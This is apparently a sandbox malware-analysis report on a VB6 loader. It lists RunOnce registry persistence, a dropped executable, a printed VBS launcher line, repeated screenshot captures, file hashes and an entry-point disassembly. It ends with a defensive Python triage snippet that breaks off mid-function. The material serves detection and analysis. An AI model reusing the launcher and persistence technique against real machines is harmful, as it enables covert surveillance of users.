02:27:20 | Autostart | Run: HKCU64\Software\Microsoft\Windows\CurrentVersion\RunOnce CHRYSOME C:\Users\user\AppData\Local\Temp\Brevsamlingssteds8\Restroke.vbs
02:28:04 | API Interceptor | 17x Sleep call for process: g4FtSOZMD9.exe modified

Joe Sandbox View / Context

IPs

No context

Domains

No context

ASN

No context

JA3 Fingerprints

No context

Dropped Files

No context

Created / dropped Files

C:\Users\user\AppData\Local\Temp\Brevsamlingssteds8\Restroke.exe
Process: C:\Users\user\Desktop\g4FtSOZMD9.exe
File Type: PE32 executable (GUI) Intel 80386, for MS Windows
Category: dropped
Size (bytes): 258048
Entropy (8bit): 5.878526280109068
Encrypted: false
SSDEEP: 3072:ShYPey2QV00E3KxPpW9J+PZK7kzqHD2+KM5KOKVhYPey2QV00E:ShYGy2a00yiw0ZK7RjbnQhYGy2a00
MD5: 81F377EDA4163DA1B74CAE83E38CED9F
SHA1: E50ABAF01A9FD3AE8176B5B6117F6B8F8A355EC0
SHA-256: A16D035CA37DBD7AB34C856F4CDF96A9898DCEBBA08C5801C99F3D3100AE6B3F
SHA-512: 8FD4613830195A00650386E450E72081546603DE6FDFF40CA039464CB5D33FD0D2AED0151C6F40558671D631C132F99A5400D9A2DB304AAC05729B941C40A63D
Malicious: true
Antivirus:
• Antivirus: ReversingLabs, Detection: 16%
Reputation: low
C:\Users\user\AppData\Local\Temp\Brevsamlingssteds8\Restroke.vbs
Process: C:\Users\user\Desktop\g4FtSOZMD9.exe
File Type: ASCII text, with CRLF line terminators
Category: dropped
Size (bytes): 126
Entropy (8bit): 4.890716777636802
Encrypted: false
SSDEEP: 3:jfF+m8nhvF3mRDN+E2J5xAIcP0WHBW73zx1dAHMn:jFqhv9IN723fOJYxXiMn
MD5: 78974D0D4A018D52ECAC4581F08C3097
SHA1: B58E51F273A55F0E72AD3066E62E385A7510C116
SHA-256: 91FA3C53A959A83B7FBC297A73221AFE509270F1BA0568B05B857C094696DF41
SHA-512: AA2256B9844FF038670652CC17DCBB71B6EA89DFA356CDAE44C29E5EC203C3B7907815EDF909D13CE4A7C084ECC4B7BAA6D37E125B3EA950F673EC75B5781FA4
Malicious: true
Reputation: low
Preview: Set W = CreateObject("WScript.Shell")..Set C = W.Exec ("C:\Users\user\AppData\Local\Temp\Brevsamlingssteds8\Restroke.exe")
C:\Users\user\AppData\Local\Temp\bhvFAB7.tmp
Process: C:\Users\user\Desktop\g4FtSOZMD9.exe
File Type: Extensible storage user DataBase, version 0x620, checksum 0x1277828c, page size 32768, DirtyShutdown, Windows version 10.0
Category: dropped
Size (bytes): 26738688
Entropy (8bit): 0.9105350923938392
Encrypted: false
SSDEEP: 24576:yHzZ+wP17f2s1ipPHihgmKdTnjVccgeTaNXvq:yHQswtT0q
MD5: 9D77F4E097E9A402A4E80E3633A107BA
SHA1: CB2A59166D899060B160A4E57E902688CE8CB723
SHA-256: E198962017B72E47DF7BB8C40BB28CBB9289051B6B0A0AA5EB9CBB778D3ACF4E
SHA-512: 0C2313F5A67A079A61B335F8483B329C3D2FAB576F728F1DBB5CC650F17C9918BE11CDAF7685D173088C0A5C50DEB16165846C8C66478F0142254BC8C6041BAD
Malicious: false
Reputation: low
C:\Users\user\AppData\Local\Temp\iwxzjjveuvjtvtlo
Process: C:\Users\user\Desktop\g4FtSOZMD9.exe
File Type: Little-endian UTF-16 Unicode text, with no line terminators
Category: dropped
Size (bytes): 2
Entropy (8bit): 1.0
Encrypted: false
SSDEEP: 3:Qn:Qn
MD5: F3B25701FE362EC84616A93A45CE9998
SHA1: D62636D8CAEC13F04E28442A0A6FA1AFEB024BBB
SHA-256: B3D510EF04275CA8E698E5B3CBB0ECE3949EF9252F0CDC839E9EE347409A2209
SHA-512: 98C5F56F3DE340690C139E58EB7DAC111979F0D4DFFE9C4B24FF849510F4B6FFA9FD608C0A3DE9AC3C9FD2190F0EFAF715309061490F9755A9BFDF1C54CA0D84
Malicious: false
Reputation: high, very likely benign file
Preview: ..
C:\Users\user\AppData\Local\Temp\~DFF48BD71CF1E747D1.TMP
Process: C:\Users\user\Desktop\g4FtSOZMD9.exe
File Type: Composite Document File V2 Document, Cannot read section info
Category: dropped
Size (bytes): 65536
Entropy (8bit): 5.966668453944976
Encrypted: false
SSDEEP: 768:hlDqxNQ65JJT1coaPeybSF3SjNrb40nEPnngv8K7e:h2v53YPey2xSVb40nE/ngv8K7e
MD5: 30022F5F6D4029602D8AE6CEC49C635A
SHA1: 3370081AEE760B36D2EB4FD2DA7FB0383DFB0BF7
SHA-256: 31F023214DFD6343171820FB95CE4CDBFFF731262EA30C7E19B627981E4B0685
SHA-512: D93BC21F9336819FFD1D4D913C50C7A6041824F7DB33C3E4875620357A953864306C10817094DB22768BF872806B1A1CFD81ABAE2DD482789A729FBD2B7D3EC6
Malicious: false
Reputation: low
C:\Users\user\AppData\Roaming\Clock\logs.dat
Process: C:\Users\user\Desktop\g4FtSOZMD9.exe
File Type: data
Category: dropped
Size (bytes): 184
Entropy (8bit): 6.922859102725601
Encrypted: false
SSDEEP: 3:z3qdECGmn6eplif1Fycug6718QzafFgfoUzf8E+T1tZno+HQpBLwdGiYdm:EZ6e7itW10fSfow8E+THc+
MD5: BD21E7F3ACACFEF0FC32FF4CC5894C68
SHA1: 2D273E62F2C9E494D88898724E75C50031657CD4
SHA-256: FAA6C759F4B7F528E50D1FDEDDF275BC3FE1B7DC83E3435EC8559A55760C25C4
SHA-512: 064D8EFAEC2AF4D29ACF936D758B7C8124C7D140B16AA09F9692F2A208A6B5C128AFDA96A95B7B152C6F964874EBE66F54C3954DE230BCCCF0B89ADD62DBF022
Malicious: false
Reputation: low
C:\Users\user\AppData\Roaming\Screenshots\time_20220102_022802.png
Process: C:\Users\user\Desktop\g4FtSOZMD9.exe
File Type: PNG image data, 1280 x 1024, 8-bit/color RGBA, non-interlaced
Category: dropped
Size (bytes): 805509
Entropy (8bit): 7.953635790065994
Encrypted: false
SSDEEP: 12288:6z0J9/6Y79QYZeUAuISCT14ckScWRgWlfStLf/aTDt5hi4IwvFZezeGTDdb:O6Sa3ZAsPcvvOWlGz/QprI0ejp
MD5: 4334E5318C03DFED4F6E16D617A0070E
SHA1: 6B21A7447FF88EB1B11BBEF3B52C3D2F3D6DC3CC
SHA-256: AA2DB20556386B90515B94B443E9D6A59B12DB69EC43F7E8E87F11E4B0B3D78B
SHA-512: 78A252D3E7947231C3A2A833A3BD96557D0E368EDE110F2FB5D22500F3EBF7F02E61544530624D0F3EB544FD0A1D1FC9CFA3811AE2E6E7589FDF069A9BBA57AE
Malicious: false
Reputation: low
C:\Users\user\AppData\Roaming\Screenshots\time_20220102_023804.png
Process:C:\Users\user\Desktop\g4FtSOZMD9.exe
File Type:PNG image data, 1280 x 1024, 8-bit/color RGBA, non-interlaced
Category:dropped
Size (bytes):805382
Entropy (8bit):7.954368693124621
Encrypted:false
SSDEEP:12288:nAG53EhiIc4ezePK+t5Xi9hbt/BZF0kRX1PBo2x32Y8Ksl7E21b+SCotr8hPUHv1:3qkIctSJnqzRX15l1slPhjVEQ
MD5:59B10CCC23A3F39295D44E8032D56A3D
SHA1:0CC43E6208D6A7C09B0FB011502D5CFDB4739DD8
SHA-256:6946B8089ABF8C6BC48402BBB186D5F75D6D4593763BA925507CB42B8214E7DD
SHA-512:DF2D4B5811504B5C1F917429B70F80416185BE76D803C15A9C66FC10CEA08F9D4B734F969A754ECFE48C8A2E8B95530CBB813127853607ED040753D8DB58C694
Malicious:false
Reputation:low
C:\Users\user\AppData\Roaming\Screenshots\time_20220102_024805.png
Process:C:\Users\user\Desktop\g4FtSOZMD9.exe
File Type:PNG image data, 1280 x 1024, 8-bit/color RGBA, non-interlaced
Category:dropped
Size (bytes):805480
Entropy (8bit):7.954487643604619
Encrypted:false
SSDEEP:24576:3qkIctSJnTfCxOkxnhEgaykcreoO+G3Jdk9:3q1c8njC0kdhE7ykaemG3JK9
MD5:92F320686B75177FC7391F48BF4E5168
SHA1:98989FDBD0723A33552DBE9B64E385DC26FD1B96
SHA-256:ED1EA6258EFB31A0706D9B90DF4BB0E1BE8D0AF6534C71B5DAA33E05FC464CA1
SHA-512:DDB5F7B0BF164AD953DDDFF832666F0947DA4DA5E1D76DD19ADD0A97D4DB42E86FB89F9A037B631B99061710F7B9158BE5A4B5D1ADD7D102DC3034EEA65C8A364
Malicious:false
Reputation:low
C:\Users\user\AppData\Roaming\Screenshots\time_20220102_025806.png
Process:C:\Users\user\Desktop\g4FtSOZMD9.exe
File Type:PNG image data, 1280 x 1024, 8-bit/color RGBA, non-interlaced
Category:dropped
Size (bytes):796305
Entropy (8bit):7.956551030400023
Encrypted:false
SSDEEP:12288:pgadi5RPDNuzJ21nUyvXrnNUgSSGy1dVm4xc1s8UWbWohhLU+OZbpT8vOKwM:Wai5VsY6y/rnRSSG+oA/8jfUNjT8yM
MD5:E099E6FD610B4ABD9E458B952610093F
SHA1:EF9E59145E10513258A29A5FA77F92B43F503FB7
SHA-256:ACAB39564DB57ACE8867707BA6D846FBDDF18993465AF31BDBAE7455C48D4A7F
SHA-512:3DAA2298F1110D8EE4EDD8923D6B494E0B289AB8CDE5963347255BEEB67AB9A32699CB815B9C37312770C0BB73DC4B057CB494AADC1D9D32224404513C7B27AA
Malicious:false
Reputation:low
C:\Users\user\AppData\Roaming\Screenshots\time_20220102_030807.png
Process:C:\Users\user\Desktop\g4FtSOZMD9.exe
File Type:PNG image data, 1280 x 1024, 8-bit/color RGBA, non-interlaced
Category:dropped
Size (bytes):805504
Entropy (8bit):7.953798912951398
Encrypted:false
SSDEEP:24576:N587VkYbbsxNdJHVJhiy7Q4PtMJvQDpeHC:N5eV+dJ1JjTPtMJvG2C
MD5:B430A99E7E9D897E03068F795C5E5909
SHA1:8395FDA71D9CBB9702A26613A98B1F9E84F25F96
SHA-256:D9F1B7AA9789BBCE3D39CBAB82BC9F7A743B81752889B4372BE4B0B2A7DAA63D
SHA-512:74A8D4B2F0E3C447307BF81B9163055C57DE5D81EB9994CA9DF0838689281C68E84DF0CCDC48D3D33AB8A902E5C6CB71E7A432F6D45DC3AE93C02C138BFBD2F1
Malicious:false
Reputation:low
C:\Users\user\AppData\Roaming\Screenshots\time_20220102_031808.png
Process:C:\Users\user\Desktop\g4FtSOZMD9.exe
File Type:PNG image data, 1280 x 1024, 8-bit/color RGBA, non-interlaced
Category:dropped
Size (bytes):805488
Entropy (8bit):7.954279315926631
Encrypted:false
SSDEEP:24576:3qkIctSJnuHCn0Wh9lcTchW6IFverrBKFgGA35:3q1c8nuHXWVcwhJNxKFgGA35
MD5:BE0ED377FAA193D230EA6DDFA66273E1
SHA1:5B5C2D468767F892F87DDE7A2F6287BAB4816A9C
SHA-256:74B38C4FD9EACA5D89F369C3D6C898FAD7ADA2F39E60C733E661E4BEA0977F8F
SHA-512:20B8B33F3E0BEC8CC177B25BDA475B575C6D3031C8BF850432E5CA0DD6875ADB2D741C74BF7D57DC33FBC90D119410638F7AF907E8164F439A9C671A631E3BE6
Malicious:false
C:\Users\user\AppData\Roaming\Screenshots\time_20220102_032809.png
Process:C:\Users\user\Desktop\g4FtSOZMD9.exe
File Type:PNG image data, 1280 x 1024, 8-bit/color RGBA, non-interlaced
Category:dropped
Size (bytes):805490
Entropy (8bit):7.95430302145449
Encrypted:false
SSDEEP:12288:nAG53EhiIc4ezePK+t5uHCn0pa3qeilgzsuy6/GjM5hi42eRbkeP7+gBml2:3qkIctSJnuHCn0eq6HTr9x5
MD5:F681C500672A0C804E44810AADE9A8F6
SHA1:00E5B453838C19CAE4CEEB6E581893E1A2113AE2
SHA-256:326A257BA12014E1EEC8EA8AF7AD277F87D6FDCB557B80D15F1F908C69CED43B
SHA-512:4B175AC60063F92C6C333F1AB901805DE69C0340742D8F394F2B65D6D84F5EDB620F01C8AFE6E4E560BEFAB79E3186760D69EAB026A28270A4E1F76A79B355F8
Malicious:false
C:\Users\user\AppData\Roaming\Screenshots\time_20220102_033810.png
Process:C:\Users\user\Desktop\g4FtSOZMD9.exe
File Type:PNG image data, 1280 x 1024, 8-bit/color RGBA, non-interlaced
Category:dropped
Size (bytes):805395
Entropy (8bit):7.954631654370981
Encrypted:false
SSDEEP:12288:nAG53EhiIc4ezePK+t5Xi9ZLTtTNSuSyIqF7fDjg1zti6LDxcz9wPU4Z+cf:3qkIctSJnkpT4iFr3gZA6nxc5KN
MD5:40FFEEA2BE692EF5B31FA989391A94D4
SHA1:9BC465F5F7BE462B048BB6C9DE07043C09466306
SHA-256:4DCE4DB74442C126CC6337F1F40878E4C6355BD66B944779B71228FBA25BF4D2
SHA-512:700F0998D336BF3F379E152E67F4CDDC3B3ABE74E4223E64CB09E5C9C2D90953577C6ED07D7EAA48F9355D4CB027BFACAD6B3CA9F7C679B6B9A32CF63A71AECB
Malicious:false
C:\Users\user\AppData\Roaming\Screenshots\time_20220102_034810.png
Process:C:\Users\user\Desktop\g4FtSOZMD9.exe
File Type:PNG image data, 1280 x 1024, 8-bit/color RGBA, non-interlaced
Category:dropped
Size (bytes):805325
Entropy (8bit):7.953809932335241
Encrypted:false
SSDEEP:12288:nAG53EhiIc4ezGn0d30f5tEsDRDCO4hpMOd+mrSNKCZ16b3hw7uAGOkIoZ0:3qkIctae0fjLlS7xJrfy6bx68Ort
MD5:53035B3321CEE45CA778710FAC73550B
SHA1:2DA8C1F262EBDCC8FB5E8E2782711A5805E298EC
SHA-256:A2D0C18D0E8F0BAF8DF2A6D5049BA5E183D7D8B866E24D97322AB7A4B71F0F41
SHA-512:7D7A318BD4C6B756DC3B8722B2562FEFE20FDCFB0E64E01EED84ECF38042A6010795F0D91D54A2845059D8F56B72D64F0FF6B4EE2BC10C09763F04D388A31943
Malicious:false
                                                                                                                                                                    C:\Users\user\AppData\Roaming\Screenshots\time_20220102_035812.png
                                                                                                                                                                    Process:C:\Users\user\Desktop\g4FtSOZMD9.exe
                                                                                                                                                                    File Type:PNG image data, 1280 x 1024, 8-bit/color RGBA, non-interlaced
                                                                                                                                                                    Category:dropped
                                                                                                                                                                    Size (bytes):805509
                                                                                                                                                                    Entropy (8bit):7.953635790065994
                                                                                                                                                                    Encrypted:false
                                                                                                                                                                    SSDEEP:12288:6z0J9/6Y79QYZeUAuISCT14ckScWRgWlfStLf/aTDt5hi4IwvFZezeGTDdb:O6Sa3ZAsPcvvOWlGz/QprI0ejp
                                                                                                                                                                    MD5:4334E5318C03DFED4F6E16D617A0070E
                                                                                                                                                                    SHA1:6B21A7447FF88EB1B11BBEF3B52C3D2F3D6DC3CC
                                                                                                                                                                    SHA-256:AA2DB20556386B90515B94B443E9D6A59B12DB69EC43F7E8E87F11E4B0B3D78B
                                                                                                                                                                    SHA-512:78A252D3E7947231C3A2A833A3BD96557D0E368EDE110F2FB5D22500F3EBF7F02E61544530624D0F3EB544FD0A1D1FC9CFA3811AE2E6E7589FDF069A9BBA57AE
                                                                                                                                                                    Malicious:false
                                                                                                                                                                    C:\Users\user\AppData\Roaming\Screenshots\time_20220102_040812.png
                                                                                                                                                                    Process:C:\Users\user\Desktop\g4FtSOZMD9.exe
                                                                                                                                                                    File Type:PNG image data, 1280 x 1024, 8-bit/color RGBA, non-interlaced
                                                                                                                                                                    Category:dropped
                                                                                                                                                                    Size (bytes):805509
                                                                                                                                                                    Entropy (8bit):7.953635790065994
                                                                                                                                                                    Encrypted:false
                                                                                                                                                                    SSDEEP:12288:6z0J9/6Y79QYZeUAuISCT14ckScWRgWlfStLf/aTDt5hi4IwvFZezeGTDdb:O6Sa3ZAsPcvvOWlGz/QprI0ejp
                                                                                                                                                                    MD5:4334E5318C03DFED4F6E16D617A0070E
                                                                                                                                                                    SHA1:6B21A7447FF88EB1B11BBEF3B52C3D2F3D6DC3CC
                                                                                                                                                                    SHA-256:AA2DB20556386B90515B94B443E9D6A59B12DB69EC43F7E8E87F11E4B0B3D78B
                                                                                                                                                                    SHA-512:78A252D3E7947231C3A2A833A3BD96557D0E368EDE110F2FB5D22500F3EBF7F02E61544530624D0F3EB544FD0A1D1FC9CFA3811AE2E6E7589FDF069A9BBA57AE
                                                                                                                                                                    Malicious:false
                                                                                                                                                                    C:\Users\user\AppData\Roaming\Screenshots\time_20220102_041814.png
                                                                                                                                                                    Process:C:\Users\user\Desktop\g4FtSOZMD9.exe
                                                                                                                                                                    File Type:PNG image data, 1280 x 1024, 8-bit/color RGBA, non-interlaced
                                                                                                                                                                    Category:dropped
                                                                                                                                                                    Size (bytes):805441
                                                                                                                                                                    Entropy (8bit):7.954613568850628
                                                                                                                                                                    Encrypted:false
                                                                                                                                                                    SSDEEP:12288:nAG53Ehi/jYdvNG+Ke3dUBvxvFe6CFpI/1sV3tMUS3LWi6LDxcz9VARmlv:3qk/KNG+HENe6upu1g3tMJ3/6nxc5VA0
                                                                                                                                                                    MD5:277253D7D217CD0CACB4715BF3175D31
                                                                                                                                                                    SHA1:AC64FC9C2DA2A1DC2D48ADFB362ACD406CA5A6F7
                                                                                                                                                                    SHA-256:15B33684A8EA5F62E043F57A0849472A887207B0C453EBFE8601D9ED80FD42F9
                                                                                                                                                                    SHA-512:634A5F562B431D30EE4A8D8548F525291F909F3040ACD848085968D6DA2538E69F003862B26F915771AA0047F92D92CB52C87A8852D5582BCCD97777F88740FD
                                                                                                                                                                    Malicious:false
                                                                                                                                                                    C:\Users\user\AppData\Roaming\Screenshots\time_20220102_042814.png
                                                                                                                                                                    Process:C:\Users\user\Desktop\g4FtSOZMD9.exe
                                                                                                                                                                    File Type:PNG image data, 1280 x 1024, 8-bit/color RGBA, non-interlaced
                                                                                                                                                                    Category:dropped
                                                                                                                                                                    Size (bytes):805441
                                                                                                                                                                    Entropy (8bit):7.954613568850628
                                                                                                                                                                    Encrypted:false
                                                                                                                                                                    SSDEEP:12288:nAG53Ehi/jYdvNG+Ke3dUBvxvFe6CFpI/1sV3tMUS3LWi6LDxcz9VARmlv:3qk/KNG+HENe6upu1g3tMJ3/6nxc5VA0
                                                                                                                                                                    MD5:277253D7D217CD0CACB4715BF3175D31
                                                                                                                                                                    SHA1:AC64FC9C2DA2A1DC2D48ADFB362ACD406CA5A6F7
                                                                                                                                                                    SHA-256:15B33684A8EA5F62E043F57A0849472A887207B0C453EBFE8601D9ED80FD42F9
                                                                                                                                                                    SHA-512:634A5F562B431D30EE4A8D8548F525291F909F3040ACD848085968D6DA2538E69F003862B26F915771AA0047F92D92CB52C87A8852D5582BCCD97777F88740FD
                                                                                                                                                                    Malicious:false
                                                                                                                                                                    C:\Users\user\AppData\Roaming\Screenshots\time_20220102_043815.png
                                                                                                                                                                    Process:C:\Users\user\Desktop\g4FtSOZMD9.exe
                                                                                                                                                                    File Type:PNG image data, 1280 x 1024, 8-bit/color RGBA, non-interlaced
                                                                                                                                                                    Category:dropped
                                                                                                                                                                    Size (bytes):805831
                                                                                                                                                                    Entropy (8bit):7.955185028460513
                                                                                                                                                                    Encrypted:false
                                                                                                                                                                    SSDEEP:24576:3qkmM120hq6axPwYs5p5lr4xSEe3HEdGfDz:3qlw2KdoPwYs5pzM0E4HAeDz
                                                                                                                                                                    MD5:8D4183371EC26ADA7FEF095B424999F6
                                                                                                                                                                    SHA1:3F6FAC40C6480D2F0FB12335DE06DF20742FE6F9
                                                                                                                                                                    SHA-256:36C92B78CD698F0A54BCBE3E84B524D91ACCDECFF32D01BB1143C4D3755DAE58
                                                                                                                                                                    SHA-512:3D8F5618DA668E26EFAB9536D6F81BB60A9BDF8C7EA36F6E185453A5D9D0E516F527329EDCDA20D4918C0E2670335A017C19A5E2434F67D7AFDD61A6D8F8C6BD
                                                                                                                                                                    Malicious:false
                                                                                                                                                                    C:\Users\user\AppData\Roaming\Screenshots\time_20220102_044815.png
                                                                                                                                                                    Process:C:\Users\user\Desktop\g4FtSOZMD9.exe
                                                                                                                                                                    File Type:PNG image data, 1280 x 1024, 8-bit/color RGBA, non-interlaced
                                                                                                                                                                    Category:dropped
                                                                                                                                                                    Size (bytes):805723
                                                                                                                                                                    Entropy (8bit):7.954324107532815
                                                                                                                                                                    Encrypted:false
                                                                                                                                                                    SSDEEP:12288:nAG53EhiIc4ezePK+t5Xi9ZLTtTNSuSyIqFOCylKpm2ajfWTB8du3/:3qkIctSJnkpT4iFO7l0Fd
                                                                                                                                                                    MD5:C919959C585542D1FECA86D4FF05456E
                                                                                                                                                                    SHA1:BCE69D21F6CEEEA1A67E4A3140C7E3F648423E00
                                                                                                                                                                    SHA-256:8B5FEC93876C5A2C7CF26E52BEF0D225E79E42C57F81C0D668C07B8C4B46FB66
                                                                                                                                                                    SHA-512:AB4731DF323CC4CF620F6EA9499B8D700AFBECBE962A6C08B2BA5B157C4DFD818D94E3677CC01DD33A0CD1593FA31418F71B8547186A41F2389DACEB4D3B1DE5
                                                                                                                                                                    Malicious:false
                                                                                                                                                                    C:\Users\user\AppData\Roaming\Screenshots\time_20220102_045816.png
                                                                                                                                                                    Process:C:\Users\user\Desktop\g4FtSOZMD9.exe
                                                                                                                                                                    File Type:PNG image data, 1280 x 1024, 8-bit/color RGBA, non-interlaced
                                                                                                                                                                    Category:dropped
                                                                                                                                                                    Size (bytes):805709
                                                                                                                                                                    Entropy (8bit):7.953835421134929
                                                                                                                                                                    Encrypted:false
                                                                                                                                                                    SSDEEP:12288:WhJ4iVkp4pkR6l/qf49+9vl6U/cQJcb7jFZA+QaK9eSbUIg9nCIBC5epXbKjj12F:WvJkOW6srl7ciSlZue7BREsmpY
                                                                                                                                                                    MD5:D1AA5C9473FE36D89ACC65401B3EE4B5
                                                                                                                                                                    SHA1:14B71284235DB7FF8D9B4AC518197EE54DAB5BEF
                                                                                                                                                                    SHA-256:A1771D0DA033DF5498722E31157AD0A15124FF9F5E5427457736ABAAB047C7CE
                                                                                                                                                                    SHA-512:DE3899888728A399ACCCA7149446083E216A254671B5698D45C8579832F39FACEACF16679B9BA870DAA818771942B8E8C6C7ABB3CE3E38738C23558864263548
                                                                                                                                                                    Malicious:false
                                                                                                                                                                    C:\Users\user\AppData\Roaming\Screenshots\time_20220102_050816.png
                                                                                                                                                                    Process:C:\Users\user\Desktop\g4FtSOZMD9.exe
                                                                                                                                                                    File Type:PNG image data, 1280 x 1024, 8-bit/color RGBA, non-interlaced
                                                                                                                                                                    Category:dropped
                                                                                                                                                                    Size (bytes):796706
                                                                                                                                                                    Entropy (8bit):7.957036024835413
                                                                                                                                                                    Encrypted:false
                                                                                                                                                                    SSDEEP:24576:tVeBGQw+UQjjkuiX84b2Qt7VJYrExxykzC:HQdU6jkuiX84b2QXJYIEkm
                                                                                                                                                                    MD5:5DC583708DCF9270E71A6374C9A03EB9
                                                                                                                                                                    SHA1:CEB14081E201F986D4D79BEACFD1D9D506A3A06F
                                                                                                                                                                    SHA-256:BA0192407BD06570B90E5FD23F5DDED63F1C5CFB01820C6843486078CB2A75B9
                                                                                                                                                                    SHA-512:13A9C3AFEBF3A36F531BEE62AF40E86BCE43859792A90BB50994D49ABB25725DE6772CAB71E46B627AEBE6C9C6B966B57AA1E3C4D72935C68B1B2174C592D5FA
                                                                                                                                                                    Malicious:false

C:\Users\user\AppData\Roaming\Screenshots\time_20220102_051818.png
Process: C:\Users\user\Desktop\g4FtSOZMD9.exe
File Type: PNG image data, 1280 x 1024, 8-bit/color RGBA, non-interlaced
Category: dropped
Size (bytes): 805744
Entropy (8bit): 7.9544298824383235
Encrypted: false
SSDEEP: 24576:n4TW8TVQ8XgQoKqq+kDCKthsZFayV/UMqppeojdg:h8TFX4QBD/tmZ0pMOpjjdg
MD5: 2EA774300B5E25393BCE4D31ADB106B8
SHA1: 245E1C52737500E44A72720EED8FDDB28FAD3243
SHA-256: 014229C2139A2EDB4E546495FA398FAF337DBD84D62A3E71E555B2B9E857A549
SHA-512: 1D9DB0BDD5BA7B7619837ECFA152BC011E7C6DB26B54BDB6467BA5539F6790BD072268B0BA719F82262EC6FB7CC7233893CC862C42A6803B4981723725270CFA
Malicious: false
                                                                                                                                                                    Preview: .PNG........IHDR................C....sRGB.........gAMA......a.....pHYs..........o.d....IDATx^...lE..}..QG%(............`..q....8(.....""..`..J0...&...b"(A....].z..o.].{w.>..y....s.zO..U.dfV}r.j.....]..72..D..zF.klQ..Y.3kz..bm.g7..sb..*&..t)..c....~6.....g.Xd.X.iuV..ms..../VI......T.3....P?.t.X..!@a.......1..U3.).....Q.gW..Y..".e........vw..$3.*.D..*Op.<z.1B.Q...h?...o..>...v.d.t..B.Z~........E!..A.3.[[%j}...W...K..~.o..b.....]dm.......bs3g...[:.=....{.M..fK..Av.?4.G..H...C.>...m..y.I..f.i.....=..K....f#.n..._.Xg.r.l;..@-M9>..}d...u!.kW..J.~.3..oMT.......EY..4.....<...G......}..5<b.f..'ce....X...i.... js.....?@..m.!.'.....v..Q%:..me.CG;[....'PX..;..........`L..q.Cj..T.lG....@.#X....[.Tgt......L.`.c@.!.........M. ........8..m:Q..cj.).).M......X.6..........}...ef.y...l]"..Yf...?.............V.Q.v.T.\.@._.S..7....l..Ft.....P.#...Y..}....-.'ce............l.&...v...*...,l+#..:.......=.."P..0.....P.@>.D..Q_.%.f..O...E.6w.4.."l.HP.l..h

Static File Info

General

File type: PE32 executable (GUI) Intel 80386, for MS Windows
Entropy (8bit): 5.878526280109068
TrID:
• Win32 Executable (generic) a (10002005/4) 99.15%
• Win32 Executable Microsoft Visual Basic 6 (82127/2) 0.81%
• Generic Win/DOS Executable (2004/3) 0.02%
• DOS Executable Generic (2002/1) 0.02%
• Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
File name: g4FtSOZMD9.exe
File size: 258048
MD5: 81f377eda4163da1b74cae83e38ced9f
SHA1: e50abaf01a9fd3ae8176b5b6117f6b8f8a355ec0
SHA256: a16d035ca37dbd7ab34c856f4cdf96a9898dcebba08c5801c99f3d3100ae6b3f
SHA512: 8fd4613830195a00650386e450e72081546603de6fdff40ca039464cb5d33fd0d2aed0151c6f40558671d631c132f99a5400d9a2db304aac05729b941c40a63d
SSDEEP: 3072:ShYPey2QV00E3KxPpW9J+PZK7kzqHD2+KM5KOKVhYPey2QV00E:ShYGy2a00yiw0ZK7RjbnQhYGy2a00
                                                                                                                                                                    File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......O.......................D.......=.......Rich............PE..L....6.Y..........................................@................

File Icon

Icon Hash: 00030313371f3800

Static PE Info

General

Entrypoint: 0x401604
Entrypoint Section: .text
Digitally signed: false
Imagebase: 0x400000
Subsystem: windows gui
Image File Characteristics: LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, RELOCS_STRIPPED
DLL Characteristics: (none)
Time Stamp: 0x599A3698 [Mon Aug 21 01:25:44 2017 UTC]
TLS Callbacks: (none)
CLR (.Net) Version: (none)
OS Version Major: 4
OS Version Minor: 0
File Version Major: 4
File Version Minor: 0
Subsystem Version Major: 4
Subsystem Version Minor: 0
Import Hash: 86e8943063c6c8ab68d4fd8da1862bd7

Entrypoint Preview

Instruction
push 0040F390h
call 00007F0A406DC843h
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
xor byte ptr [eax], al
add byte ptr [eax], al
inc eax
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [ebp+0297E4EAh], dl
out dx, al
sub ecx, dword ptr [edi-58h]
inc byte ptr [375B32A1h]
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add dword ptr [eax], eax
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
inc ecx
outsb
popad
insd
outsb
imul esp, dword ptr [ecx+33h], 00000000h
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
dec esp
xor dword ptr [eax], eax
add dh, bh
std
adc esp, dword ptr [edx]

Only the first two instructions are code. They are the standard Visual Basic 6 entry stub: push the address of the VB project header (0x40F390, the structure that starts with the ASCII tag "VB5!") and call MSVBVM60!ThunRTMain through a `jmp dword ptr [IAT]` thunk; the runtime initialises itself from that header and reaches the program's own code from there, not from the entry point. The 64-bit call target printed above is a rendering artefact of the disassembler; in the file it is a 5-byte near call. Everything after the call is data that the disassembler keeps decoding: `add byte ptr [eax], al` is the byte pair 00 00, and the run `inc ecx`, `outsb`, `popad`, `insd`, `outsb` is the printable bytes 41 6E 61 6D 6E.
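Recognising that stub from raw bytes is a cheap triage check for VB6-based loaders such as this one, and it yields the header address a VB decompiler or manual analysis would start from. The Python below is an added example, not part of the report: only the `push 0040F390h` encoding and the entry VA 0x401604 come from the page; the call displacement (chosen so the thunk sits just before the entry point) and the trailing NUL bytes are constructed, since the page shows a mis-based call target rather than the raw encoding.

```python
import struct
from typing import Optional, Tuple

ENTRY_VA = 0x401604  # entry point from the report's Static PE Info

# Entry-point bytes. The first five (push 0040F390h) are the report's; the call
# displacement (-0x10, i.e. a thunk just before the entry point) and the trailing
# NUL bytes are constructed for this example.
ENTRY_BYTES = (
    b"\x68\x90\xF3\x40\x00"       # push 0x0040F390 ; address of the "VB5!" project header
    b"\xE8\xF0\xFF\xFF\xFF"       # call rel32      ; -> jmp dword ptr [MSVBVM60!ThunRTMain]
    b"\x00\x00\x00\x00\x00\x00"   # data; rendered by the report as "add byte ptr [eax], al"
)


def parse_vb6_entry_stub(code: bytes, va: int) -> Optional[Tuple[int, int]]:
    """Match the two-instruction VB6 entry stub
           68 <imm32>   push <VB header VA>
           E8 <rel32>   call <ThunRTMain thunk>
    and return (vb_header_va, call_target_va), or None if the bytes differ."""
    if len(code) < 10 or code[0] != 0x68 or code[5] != 0xE8:
        return None
    vb_header_va = struct.unpack_from("<I", code, 1)[0]
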